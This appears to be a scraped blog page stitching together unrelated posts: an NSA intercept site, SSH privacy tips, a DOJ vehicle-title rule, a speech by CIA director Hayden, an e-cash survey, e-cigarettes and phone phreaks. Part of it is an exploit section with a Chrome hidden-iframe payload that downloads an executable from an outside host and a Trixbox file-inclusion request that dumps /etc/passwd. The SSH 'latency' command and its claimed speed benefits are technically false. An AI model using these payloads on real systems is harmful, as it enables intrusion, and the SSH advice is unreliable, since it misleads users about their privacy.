Sugar Grove is an American government communications site located in Pendleton County, West Virginia 38.514997, -79.28421 operated by the National Security Agency. According to a December 25, 2005 article in the New York Times, the site intercepts all international communications entering the Eastern United States.

The site was first developed by the Naval Research Laboratory in the early 1960s as the site of a 600 ft radio telescope that would gather intelligence on Soviet radar and radio signals reflected from the moon and would gather radioastronomical data on outer space, but the project was halted in 1962 before the telescope construction was completed. The site was then developed as a radio receiving station. The site was activated as “Naval Radio Station Sugar Grove” on May 10, 1969, and two Wullenweber Circulary Disposed Antenna Arrays (CDAAs) were completed on November 8, 1969. Numerous other antennas, dishes, domes, and other facilities were constructed in the following years. Some of the more significant radio telescopes on site are a 60 ft dish (oldest telescope on site), a 105 ft dish featuring a special waveguide receiver and a 150 ft dish (largest telescope on site).

Though the CDAAs were decommissioned in the 1990s, the site is still active, and photographs taken between 2000 and 2004 show significant construction on the site.

The site is part of the ECHELON communications network operated by the United States and its allies to intercept and process electronic telecommunications. The network operates many sites around the world including Waihopai Valley in New Zealand, Menwith Hill in the United Kingdom and Yakima, Washington.

Sugar Grove is located in an officially designated National Radio Quiet Zone that covers 13,000 square miles in West Virginia and Virginia. The zone was established by Congress in 1958 to facilitate its mission and that of the National Radio Astronomy Observatory located 30 miles away at Green Bank in Pocahontas County, West Virginia.

The small community of Sugar Grove is located several miles south of the installation. Its ZIP Code is 26815.

The NSA TCP/IP traffic analysis program primarly focuses on the traffic analysis of WAN ATM (Asynchronous Transfer Mode) cell header and payload data at IXPs (Internet Exchange Points) globally that employ Cisco Systems routing equipment.

Concerned persons should implement the following:

1. If possible, ensure that your network routing equipment’s’ ATM switched virtual connections and permanent virtual connections are disabled; AND
2. Tunnel your TCP/IP connections over a new SSH2 session for each and every new WAN TCP/IP routed connection (for EVERY transmission to any WAN address); AND
3. Create transmission latency for each of your new WAN SSH2-enabled TCP/IP routed connections through a modified SSH login command such as:

ssh -N -L 6000:localhost:4000 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4 -l User 1.2.3.4

Note that localhost is on port 6000 and remote web host proxy is on port 4000; username is User (if using SSH user authentication); and remote SSH server IP is 1.2.3.4; transmission latency is created with multiples of -l User 1.2.3.4.

More to follow on creating transmission latency when using remote port forwarding through OpenVPN.

If your server traffic is a specific collection target of NSA/Level 3 Communications Regional Security Center (NSA/CSS Georgia) at Fort Gordon Georgia USA or of one of NSA’s non-US affiliates, flagging of sniffed IXP traffic for subsequent analysis can only be triggered by your server’s SECOND or subsequent routing connection to one or more WAN addresses.

Perhaps surprisingly, if your server’s traffic is a collection target, your users’ use of the above SSH transmission latency will also actually increase users’ upload and download speeds during SSH2 sessions.

DEPARTMENT OF JUSTICE

28 CFR Part 25

[Docket No. FBI 117; AG Order No. 3000-2008]
RIN 1110-AA30


National Motor Vehicle Title Information System (NMVTIS)

AGENCY: Department of Justice.

ACTION: Proposed rule.

———————————————————————————————————-

SUMMARY: The National Motor Vehicle Title Information System (NMVTIS)
has been established pursuant to 49 U.S.C. 30502 and is in operation,
or partial operation, in at least 25 states. NMVTIS is intended to
provide authorized recipients with instant and reliable access to motor
vehicle titling information maintained by the states. The goal of
NMVTIS is to assist in efforts to prevent the introduction or
reintroduction of stolen motor vehicles into interstate commerce.
NMVTIS helps state titling agencies by verifying motor vehicle and
title information, information on brands applied to motor vehicles, and
information regarding whether motor vehicles have been reported stolen.
This rule implements the NMVTIS reporting requirements imposed on junk
yards, salvage yards, and insurance carriers pursuant to 49 U.S.C.
30504(c). This rule also clarifies the process by which NMVTIS will be
funded and clarifies the various responsibilities of the operator of
NMVTIS, states, junk yards, salvage yards, and insurance carriers
regarding NMVTIS.

DATES: Written comments must be submitted on or before November 21,
2008.

ADDRESSES: Comments may be mailed to: James Landon, 935 Pennsylvania
Ave., NW., Washington, DC 20535. To ensure proper handling, please
reference FBI Docket No. 117 on your correspondence. You may submit
comments electronically or view an electronic version of this proposed
rule at http://www.regulations.gov.

FOR FURTHER INFORMATION CONTACT: David P. Lewis, 810 7th Street, NW.,
Washington, DC 20531, 202-616-6500.

SUPPLEMENTARY INFORMATION:

Posting of Public Comments

Please note that all comments received are considered part of the
public record and made available for public inspection online at http:/
/www.regulations.gov. Such information includes personal identifying
information (such as your name, address, etc.) voluntarily submitted by
the commenter.
If you want to submit personal identifying information (such as
your name, address, etc.) as part of your comment, but do not want it
to be posted online, you must include the phrase “PERSONAL IDENTIFYING
INFORMATION” in the first paragraph of your comment. You also must
locate all the personal identifying information you do not want posted
online in the first paragraph of your comment and identify what
information you want redacted.
If you want to submit confidential business information as part of
your comment but do not want it to be posted online, you must include
the phrase “CONFIDENTIAL BUSINESS INFORMATION” in the first paragraph
of your comment. You also must prominently identify confidential
business information to be redacted within the comment. If a comment
has so much confidential business information that it cannot be
effectively redacted, all or part of that comment may not be posted on
http://www.regulations.gov.
Personal identifying information and confidential business
information identified and located as set forth above will be placed in
the agency’s public docket file, but not posted online. If you wish to
inspect the agency’s public docket file in person by appointment,
please see the FOR FURTHER INFORMATION CONTACT paragraph.

Background

The Anti-Car Theft Act of 1992 (Pub. L. 102-519) required the
Department of Transportation (DOT) to establish an information system
intended to enable states and others to access automobile titling
information. As part of the Anti-Car Theft Act of 1992, DOT was
authorized to designate a third party to operate the system. Since
1992, the American Association of Motor Vehicle Administrators (AAMVA)
has acted in the capacity of the operator of the system. AAMVA is a
nonprofit, tax exempt, educational association representing U.S. and
Canadian officials who are responsible for the administration and
enforcement of motor vehicle laws. The requirements of the Anti-Car
Theft Act of 1992 were amended by Public Law 103-272 and the Anti-Car
Theft Improvements Act of 1996 (Pub. L. 104-152). The Anti-Car Theft
Improvements Act of 1996 renamed the automobile titling system the
“National Motor Vehicle Title Information System” (NMVTIS) and
transferred responsibility for implementing the system from DOT to the
Department of Justice (hereinafter, the Anti-Car Theft Act of 1992 and
the revisions made by Public Law 103-272 and the Anti-Car Theft
Improvements Act of 1996, codified at 49 U.S.C. 30501-30505, are
collectively referred to as the “Anti-Car Theft Act”).
The purpose of NMVTIS is to provide an electronic means for
verifying and exchanging title, brand, and theft data among motor
vehicle administrators, law enforcement officials, prospective
purchasers, and insurance carriers.\1\ To date, the implementation of
NMVTIS has focused on establishing access by the states and not on
providing access to other authorized users. Currently, 33 states are
actively involved with NMVTIS, representing more than 60 percent of the
U.S. motor vehicle population. Specifically, 13 states are
participating fully in NMVTIS, 12 states are regularly providing data
to the system, and an additional 8 states are actively taking steps to
provide data or participate fully.\2\ States that participate fully in
the system provide data regularly and have the ability to make NMVTIS
inquiries before issuing a new

Click to read more ...

The failure to connect the dots, dismissal of warnings as unfounded, declarations of unexpected calamity, calls for urgent action by government to prevent greater disaster, insistence that Congress and the Administration must act immediately, frightening secret briefings by those who claim to know what has led to the emergency and what must be done to handle it, public assurances that while the nation is in jeopardy wise heads have a plan for protection, with continuing risk to be borne by all Americans, those responsible for a solution to be trusted in the future even though they failed in their responsiblities to prevent the crisis, and don’t waste time questioning who was responsible for the failure now is the time to plan for the future.

That the problem is due to the US dropping its guard, being complacent about its superiority, not recognizing threats different from those well-known in political and military terms. And failing to see that a national threat has come from a source that no sensible person could have foreseen, sure a few gloom and doomers raised alarms about incomprehensible financial dealings, but who could believe those obsessed with imaginary hazards to the financial market.

Financial power has shifted from the US to Asia and the Middle East, some say, and who knows, maybe that was the plan — to outfox the US masters of the financial universe who believed that nobody better knew global economics, and no nation could challenge military protection of the US economy.

Since 9/11 the second 9/11 was predicted to happen in a way that could not be anticipated, that its success would depend on bypassing defenses derived from the first 9/11. Not nuclear, biological or chemical, but financial. Why target a few thousands when millions can be harmed using the institutions and technologies invented for global commerce supremacy — hi-jacked airliners a mere test run.

The confused rush to handle the financial crisis with piecemeal reactions developed over a couple of weeks is likely to have been anticipated by attackers to panic their targets while continuing to withdraw funds from US institutions, picking them off one by one, assured that no military countermeasure is possible so long as targets cannot be identified in time to halt the aggression.

Or is there an armageddon military spasm in the offing of wounded warriors unable to pinpoint targets so goes for all in the database of those who invented, inflicted, condoned and avoided punishment for debt WMD.

[Federal Register: September 22, 2008 (Volume 73, Number 184)]

            Presidential Documents 
___________________________________________________________________

Title 3--
The President

        Notice of September 18, 2008
 
        Continuation of the National Emergency With 
        Respect to Persons Who Commit, Threaten to Commit, or 
        Support Terrorism

        On September 23, 2001, by Executive Order 13224, I 
        declared a national emergency with respect to persons 
        who commit, threaten to commit, or support terrorism, 
        pursuant to the International Emergency Economic Powers 
        Act (50 U.S.C. 1701-1706). I took this action to deal 
        with the unusual and extraordinary threat to the 
        national security, foreign policy, and economy of the 
        United States constituted by the grave acts of 
        terrorism and threats of terrorism committed by foreign 
        terrorists, including the terrorist attacks in New 
        York, in Pennsylvania, and against the Pentagon 
        committed on September 11, 2001, and the continuing and 
        immediate threat of further attacks against United 
        States nationals or the United States. Because the 
        actions of these persons who commit, threaten to 
        commit, or support terrorism continue to pose an 
        unusual and extraordinary threat to the United States, 
        the national emergency declared on September 23, 2001, 
        and the measures adopted on that date to deal with that 
        emergency, must continue in effect beyond September 23, 
        2008. Therefore, in accordance with section 202(d) of 
        the National Emergencies Act (50 U.S.C. 1622(d)), I am 
        continuing for 1 year the national emergency with 
        respect to persons who commit, threaten to commit, or 
        support terrorism.

        This notice shall be published in the Federal Register 
        and transmitted to the Congress.
        
          (Presidential Sig.)

        THE WHITE HOUSE,

          Washington, September 18, 2008

Remarks by Central Intelligence Agency Director Michael Hayden
at the Los Angeles World Affairs Council

Good afternoon. Thanks for that kind introduction, and thank you all for inviting me. It’s a pleasure and privilege to be in Los Angeles and to speak to this Council.

As eventful as the world may be right now, the development that is likely to have the most far-reaching consequences will be a domestic one—the election of a new American president. From the standpoint of the Intelligence Community, it’ll be the first time since 1952 that neither candidate is an incumbent president or vice president. It also will be the first transition since the office of Director of National Intelligence was created, and that will be a new experience for all of us.

CIA is the Community’s executive agent in supporting briefings for Senator McCain and Senator Obama, reflecting our role in producing the President’s Daily Brief. After the election, there will be two daily PDB briefings—one for President Bush and another for the president-elect. The new national security team will be setting up shop, too, so it promises to be a very busy time for everyone involved.

The new administration will be a great opportunity for the Agency. I see it as a chance to demonstrate our expertise and insight into virtually every foreign issue affecting this country. We’ll get to know all our new customers and learn how best to serve them. But our fundamental responsibility—protecting the citizens of this nation—will remain the same.

Today I’d like to talk about how CIA keeps America safe from weapons of mass destruction, particularly the nuclear threat. Meeting that critical challenge has been a core responsibility ever since the Agency’s founding in 1947.

In fact, the very first CIA officer to die in the line of duty had been gathering data on the Soviet nuclear program. Douglas Mackiernan served in the desolate reaches of western China, one of those brave operatives who worked our top intelligence target along the periphery of the Soviet Union.

“Mack,” as he was called, was an MIT physics major conversant in Russian and Chinese, a highly resourceful and perceptive officer who had to work with some pretty basic equipment given the remoteness of his post. His primary tasks were to investigate Moscow’s access to local uranium deposits and report any sign of nuclear testing in Soviet Central Asia.

Mackiernan’s mission was cut short by the rapid western advance of the Chinese Communists after their revolution in 1949. He escaped by setting out on an epic seven-month trek across deserts and mountains. He managed to make it all the way to the frontier of Tibet, where he should have found sanctuary. Tragically, he was shot by Tibetan guards who had not yet received word that an American was coming and that he should be granted safe passage.

Douglas Mackiernan’s story speaks to the dedication and courage our officers have brought to our mission for six decades. CIA has targeted the WMD threat in all its forms, from the massive arsenals of rival nations to the deadly aspirations of terrorists. To say that we’re focused on 21^st century challenges doesn’t mean for a second that we’ve forgotten those of the 20^th—or that we aren’t looking for the emerging threats of tomorrow.

We closely analyze, as we should and as we must, the WMD and missile programs of countries throughout the world. But as attentive as we are in tracking existing weapons programs, the greater challenge lies in detecting those developing in secrecy. CIA is always watching for signs that states and subnational groups might be taking steps to acquire nuclear, biological, or chemical weapons.

Our mission is made a lot more difficult by the fact that access to sensitive technologies is no longer the exclusive domain of a few advanced nations. Dual-use technologies and scientific experts travel easily in our global economy, making it critical to follow those movements and know the experts.

But because the materials and expertise are so prevalent and have perfectly legitimate applications, the very fact that someone is interested in nuclear, chemical, or biological technology is not enough to prove they are interested in weapons. A WMD program fundamentally centers on political intent.

By that measure alone, there is no greater national security threat facing the United States than al-Qa‘ida and its associates. Bin Ladin has said repeatedly that he considers acquisition of nuclear weapons “a religious duty.” And we know that al-Qa‘ida remains determined to attack our country in ways that inflict maximum death and destruction.

We are fortunate that those with the clearest intent to acquire and use weapons of mass destruction are also the least capable of developing them. But the potential destruction from an improvised nuclear device—no matter how elementary—is so great that all that really matters to CIA is that we know terrorists are determined to use them.

We fight this threat on two fronts—the supply side and the demand side. CIA has a group devoted to identifying, penetrating, and disrupting WMD-related proliferation networks. That group is at the heart of a highly integrated effort, drawing on the expertise of our own analysts and intelligence collectors and their colleagues throughout government. Together with our foreign partners, we account for and help safeguard WMD and related equipment worldwide. We identify the illegal sellers and buyers of technology and expertise. And we use covert action to disrupt illicit transfers.

At the same time, we work—methodically, patiently, tirelessly—to penetrate and destroy terrorist networks. Operating against both ends of the chain is critical to detecting and defeating any nuclear plot against America or our allies.

CIA also focuses on Iran and North Korea, two states whose WMD programs have threatened US interests, regional stability, and international arms control mechanisms like the Non-Proliferation Treaty. North Korea conducted a nuclear test two years ago, and the Intelligence Community judges their program produced enough plutonium for at least a half-dozen weapons. For its part, Iran has the scientific, technical, and industrial capacity to produce nuclear weapons eventually. The question is not of capability, but intent.

A good analyst never presumes anything, least of all the plans of a foreign power. Intelligence officers can only assess capability and intent by starting with a clean slate and working from solid evidence and known behavior. That’s precisely what our Community did last year on Tehran’s nuclear program. The result was the Iran National Intelligence Estimate released in November.

The Iran NIE has had its share of criticism, which is typically what happens with a rigorous estimate that lays out what we know and don’t know about a highly contentious issue. It’s detailed, thorough, and—quite frankly—it’s courageous. We don’t have time to delve into the full scope of its findings, but here, very briefly, are the major judgments:

• Until the fall of 2003, elements of Iran’s military were working to develop nuclear weapons and a warhead capable of delivering such weapons.
• Tehran halted these efforts probably due to international scrutiny and exposure of previously undeclared nuclear work. We assessed that the nuclear weapons program had not resumed as of mid-2007, a conclusion that subsequent intelligence still supports.
• And finally, Tehran at a minimum is keeping open its option to develop nuclear weapons.

What leads us to this last judgment? Again, it’s a matter of working back from actions. Why are they pushing forward with the uranium enrichment process at Natanz? They say it’s for civilian purposes, and yet they’ve rejected international offers of fissile material under proper controls.

Iran’s behavior, coming as it does after years of nuclear activity they concealed and continue to deny, invites nothing but suspicion. Why are they slow-rolling the International Atomic Energy Agency by not being forthcoming? And why are they willing to defy the United Nations and pay such a heavy price in terms of international isolation?

Those questions sound familiar. One could argue that Iraq under Saddam was just as confrontational and ultimately lacked the weapons we thought were there. But Iran’s leaders saw what happened to Saddam, and still they reject every opportunity to come clean with the world.

North Korea also poses a broad and complex challenge to global arms control. In fact, the WMD problem in Iran is compounded to no small degree by Tehran’s collaboration with North Korea on ballistic missiles.

Pyongyang’s WMD programs present a double threat. As part of North Korea’s arsenal, they endanger the peace and stability of northeastern Asia. As a source of global proliferation, they have been without equal since a joint operation with our British partners took down A.Q. Khan earlier this decade. Like Khan, whose network had been the world’s most dangerous black market supplier of nuclear technology, North Korea asks only two things of its customers: first, can they pay, and second, can they keep a secret.

Thanks to some outstanding intelligence work, we were able last year to spoil a big secret, a project that could have provided Syria with plutonium for nuclear weapons. I’d like to cover it here because it’s an excellent example of how CIA and our Community colleagues attack the problem of nuclear proliferation.

It was reported in the press last April, and you’re probably familiar with its outlines. We knew that North Korea and Syria had been cooperating since the late 1990s in the nuclear field. The depth of that relationship was revealed in the spring of last year, when we identified a nuclear reactor at Al-Kibar in the eastern desert of Syria. It was similar to the one at Yongbyon in North Korea, but with its outer structure heavily disguised.

The situation became critical late last summer, when we judged the facility could be nearing operation. The Al-Kibar reactor was destroyed the morning of 6 September 2007. The Syrians immediately cleared away the rubble and every trace of the building, stonewalling the IAEA when asked to explain. Their cover-up only underlined the intense secrecy of this project and the danger it had posed to a volatile region.

I want to focus briefly on two important aspects of this intelligence effort: the quality of tradecraft, in terms of collection and analysis, and the value of collaboration, both with colleagues in our government and with foreign services.

More than anything else, our work was a classic example of multidisciplinary, blue-collar analysis. We had a group of officers who started working overtime on this issue in April 2007 and kept at it for months. Virtually every form of intelligence—imagery, signals, human source, you name it—informed their assessments, so that they were never completely dependent on any single channel.

For instance, a report from a foreign partner initially identified the structure at Al-Kibar as a nuclear reactor similar to one in North Korea. But even without that piece of the puzzle, it wouldn’t have been long before we reached the same conclusion. We had previously identified the facility on imagery as a suspicious target. When pipes for a massive cooling system were laid out to the Euphrates River in the spring of 2007, there would have been little doubt this was a nuclear reactor. We would have known it was North Korean, too, given the quantity and variety of intelligence reports on nuclear ties between Pyongyang and Damascus.

Still, our analysts were open to alternative possibilities at every juncture. Early on, they applied a methodology that laid out the inconsistencies in each competing hypothesis. They carefully examined whether the building might be for another purpose, like a conventional power plant, or a water treatment facility. In each case, the arguments simply didn’t add up.  The reactor hypothesis was the most difficult to refute with the available evidence.

We then stepped back and tried to turn the basic premise on its head: OK, we’ve got a nuclear reactor in Syria built with North Korean help, but is it necessarily for a Syrian program? Might it have been built by North Korea for its own use, to secretly replace the Yongbyon reactor they had pledged to shut down? We took that hypothesis and worked very hard on it, but the mainstream theory held sway.

Finally, this was a success reached through close collaboration across agencies, departments, and governments. Dedicated officers at CIA, DIA, the Department of Energy, the National Geospatial Intelligence Agency, and NSA came together as a team, each bringing a specific expertise to the table. And this was an intelligence problem that required a wide range of knowledge. I already mentioned all the different forms of collection, but it also drew from a remarkable diversity of analytic firepower—everyone from nuclear technology and weapons experts to political and leadership analysts.

Our foreign partnerships too were critical to the final outcome. These relationships aren’t a matter of occasionally passing along a report that may or may not be useful. They’re more akin to working together on a complex equation over a long period. Each tries to solve a variable that in turn helps a partner solve another, and so on until we’ve cracked the case. That’s what good intelligence is all about.

I hope my remarks today have given you a better idea of how CIA is meeting the counterproliferation challenge. The Intelligence Community as a whole has taken great strides since the pre-war NIE on Iraq to strengthen our tradecraft, and I think it shows with both the Iran estimate and the Al-Kibar effort. The rigor of our sourcing, the emphasis on alternative analysis, and the integration of our expertise with those of our colleagues have never been greater.

By history and law, CIA has more connective tissue to the rest of the Intelligence Community than any other organization. We draw on those deep connections and other unique strengths—in human intelligence collection, all-source analysis, and foreign liaison partnerships—to fulfill a single overriding mission: protecting the American people. That remains the ultimate standard by which we measure our success.

I am tremendously proud of the men and women of CIA. They give far more than they get, and deserve far better than they usually receive. Like Doug Mackiernan before them, today’s CIA officers face the same risks, possess the same spirit, and serve the same cause. They accomplish their mission in ways I’m sure would make you proud, too.

Thank you very much.

With the onset of the Information Age, our nation is becoming increasingly dependent upon network communications. Computer-based technology is significantly impacting our ability to access, store, and distribute information. Among the most important uses of this technology is electronic commerce: performing financial transactions via electronic information exchanged over telecommunications lines. A key requirement for electronic commerce is the development of secure and efficient electronic payment systems. The need for security is highlighted by the rise of the Internet, which promises to be a leading medium for future electronic commerce.

Electronic payment systems come in many forms including digital checks, debit cards, credit cards, and stored value cards. The usual security features for such systems are privacy (protection from eavesdropping), authenticity (provides user identification and message integrity), and nonrepudiation (prevention of later denying having performed a transaction) .

The type of electronic payment system focused on in this paper is electronic cash. As the name implies, electronic cash is an attempt to construct an electronic payment system modelled after our paper cash system. Paper cash has such features as being: portable (easily carried), recognizable (as legal tender) hence readily acceptable, transferable (without involvement of the financial network), untraceable (no record of where money is spent), anonymous (no record of who spent the money) and has the ability to make “change.” The designers of electronic cash focused on preserving the features of untraceability and anonymity. Thus, electronic cash is defined to be an electronic payment system that provides, in addition to the above security features, the properties of user anonymity and payment untraceability..

In general, electronic cash schemes achieve these security goals via digital signatures. They can be considered the digital analog to a handwritten signature. Digital signatures are based on public key cryptography. In such a cryptosystem, each user has a secret key and a public key. The secret key is used to create a digital signature and the public key is needed to verify the digital signature. To tell who has signed the information (also called the message), one must be certain one knows who owns a given public key. This is the problem of key management, and its solution requires some kind of authentication infrastructure. In addition, the system must have adequate network and physical security to safeguard the secrecy of the secret keys.

This report has surveyed the academic literature for cryptographic techniques for implementing secure electronic cash systems. Several innovative payment schemes providing user anonymity and payment untraceability have been found. Although no particular payment system has been thoroughly analyzed, the cryptography itself appears to be sound and to deliver the promised anonymity.

Click to read more ...

Google Chrome Browser 0.2.149.27 Automatic File Download Exploit

Description: Google’s new Web browser (Chrome) allows files (e.g., executables) to be automatically  downloaded to the user’s computer without any user prompt. This proof of concept was created for educational purposes only and has been successfully tested on Windows Vista SP1 and Windows XP SP3.

Example exploit code:

<script>
document.write(‘<iframe src=”http://www.ph33r.org/evilcodeexe” frameborder=”0” width=”0” height=”0”>’);
</script>

Buffer Overflow Exploit for Google Chrome 0.2.1.49.27

Description: The vulnerability is caused due to a boundary error when handling the “Save As” function. On saving a malicious page with an overly long title (<title> tag in HTML), the program causes a stack based overflow and makes it possible for attackers to execute arbitrary code on users’ systems. To exploit the vulnerability, one could connstruct a specially crafted web page, which contains malicious code and trick visitors saving the webpage. Once the page is saved, the code is executed.

Exploit: http://ph33r.org/storage/exploits-2008/2008-chrome.tar

A local file inclusion vulnerability affects Trixbox CE, an Asterisk-based PBX Phone system. This issue is due to a failure of the application to properly sanitize POST data assigned to a parameter of the /user/index.php page. An attacker may leverage this issue to read local files, execute PHP scripts and eventually obtain a root shell. Vulnerable server-side program: ‘/user/index.php’ Vulnerable parameter: ‘langChoice’

Proof of concept:

 

Complete HTTP Request:

POST /user/index.php HTTP/1.1
Host: 192.168.1.107
Content-Type: application/x-www-form-urlencoded
Content-Length: 39

langChoice=../../../../../etc/passwd%00

 

Complete HTTP Response:

HTTP/1.1 200 OK
Date: Tue, 08 Jul 2008 13:25:00 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.2
Set-Cookie: PHPSESSID=98b589cad80822c098942d33a1558b9f; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8

1f4a
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
[…]

Click to read more ...

THE E-CIGARETTE              (click image to enlarge)     An e-cigarette. The white portion is the battery, the middle part (white with small hole) is the atomizer and the brown portion is the mouthpiece and cartridge.I recently learned from a fellow co-worker of mine of an amazing new safer alternative to smoking known as the e-cigarette. The device takes the form of a tiny rod which is slightly longer than a normal cigarette. The mouthpiece of the device contains a replaceable cartridge filled with liquid. The main substances contained in the liquid are nicotine and propylene glycol.

When the user inhales through the device, the air flow is detected by a sensor. A microprocessor then activates an atomizer or nebulizer which injects tiny droplets of the liquid into the flowing air and vaporizes the nicotine. This produces a vapor mist which is inhaled by the user. The addition of propylene glycol to the liquid makes the mist better resemble normal cigarette smoke. The microprocessor also activates an orange LED at the tip to simulate real smoking.

E-cigarettes generally use a rechargeable battery as a power source. Battery life varies between devices, with some lasting a day between charges, and others lasting a week.

Developed in China by Hon Lik of Ruyan, the technology is patent pending worldwide.

Cartridges for e-cigarettes are usually offered in a variety of formulations, with different flavors and nicotine concentrations. At the upper range of nicotine concentrations, e-cigarette smoking is equivalent in nicotine delivery to average tobacco cigarettes. Most companies also offer a range of milder options, including completely nicotine-free cartridges. Depending on the device, the solution cartridges are good for between 100 to 600 drags. An empty cartridge can be replaced with a new cartridge or it can be refilled with solution. This solution is sometimes called e-liquid and is often sold in bottles of 10 ml. The Ruyan patent application mentions four different recipes for the nicotine solution:

 

Substance	Recipe 1	Recipe 2	Recipe 3	Recipe 4
Propylene Glycol	85%	80%	90%	80%
Nicotine	6%	4%	2%	0.1%
Glycerol	2%	5%	-	5%
Tobacco Essence	-	4%	4.5%	1%
Essence	2%	-	1%	1%
Organic Acid	1%	-	-	2%
Anti-Oxidation Agent	1%	-	-	-
Butyl Valerate	-	1%	-	-
Isopentyl Hexonate	-	1%	-	-
Lauryl Laurate	-	0.6%	-
Benzyl Benzoate	-	0.4%	-	-
Methyl Octynicate	-	0-5%	-	-
Ethyl Heptylate	-	0.2%	-	-
Hexyl Hexanoate	-	0.3%	-	-
Geranyl Butyrate	-	2%	-	-
Menthol	-	0.5%	-	-
Citric acid	-	0.5%	2.5%	-
Water	-	-	-	2.9%
Alcohol	-	-	-	8%

 

 

 

Gamucci Electronic Cigarette

E-cigarettes are marketed as a healthier alternative to tobacco smoking, since most of the harmful material produced by the combustion of tobacco in traditional cigarettes is not present in the atomized liquid of e-cigarettes. They have also been marketed as a way to keep or curtail an addiction to nicotine.

Various toxicological studies of the electronic cigarettes have been conducted, with some concluding that electronic cigarettes are less harmful than traditional tobacco cigarettes, because they can deliver nicotine into the lungs without the carcinogens and toxicants. Nevertheless, the devices still deliver nicotine, which is linked to several harmful circulatory diseases.

RUYAN Electronic Cigarette

 

I’m sure that the large American tobacco companies are in the process of doing everything in their power to retain their control on what is a billion dollar business.

In the European Union some countries have stipulated a decision according to the legal status of e-cigarette products.

With all the talk about the new wiretapping law the Senate is expected to approve this week, there are many federal surveillance programs that are going largely ignored,   unmentioned — and unmonitored.

In 1971, Ron Rosenbaum’s Esquire article, “Secrets of the Little Blue Box”, introduced America to phone phreaks, a subterranean network of geek explorers who probed the global phone system as the world’s largest pre-Internet interconnected machine. A star of Rosenbaum’s piece was Joe Engressia, a blind telephonic hacking pioneer with perfect pitch and a high IQ, who seized control over phone systems by whistling dual-tone, multi-frequency pitches into telephone receivers.

Before the introduction of modern phone-switching technology, audible tones were used to connect phones with distant destinations. As a young child, Engressia was obsessed with the telephone, finding comfort within the steady blare of the dial tone. At the age of 5, he discovered he could dial the phone by clicking the receiver’s hang-up switch, and at 7 he accidentally discovered that whistling specific frequencies could activate phone switches. From there, experimentation, brilliance, networking and perseverance led Engressia to probe weaknesses in the network that allowed him to make free phone calls. His mastery over this global machine was liberating, if not obsessive.

As Rosenbaum was completing his 1971 article, Engressia was arrested for theft of telephone services. At the time it appeared that the phone company had only recently become aware of his activities – though a few years earlier he had been expelled from the University of South Florida for selling fellow students long-distance calls for a dollar each.

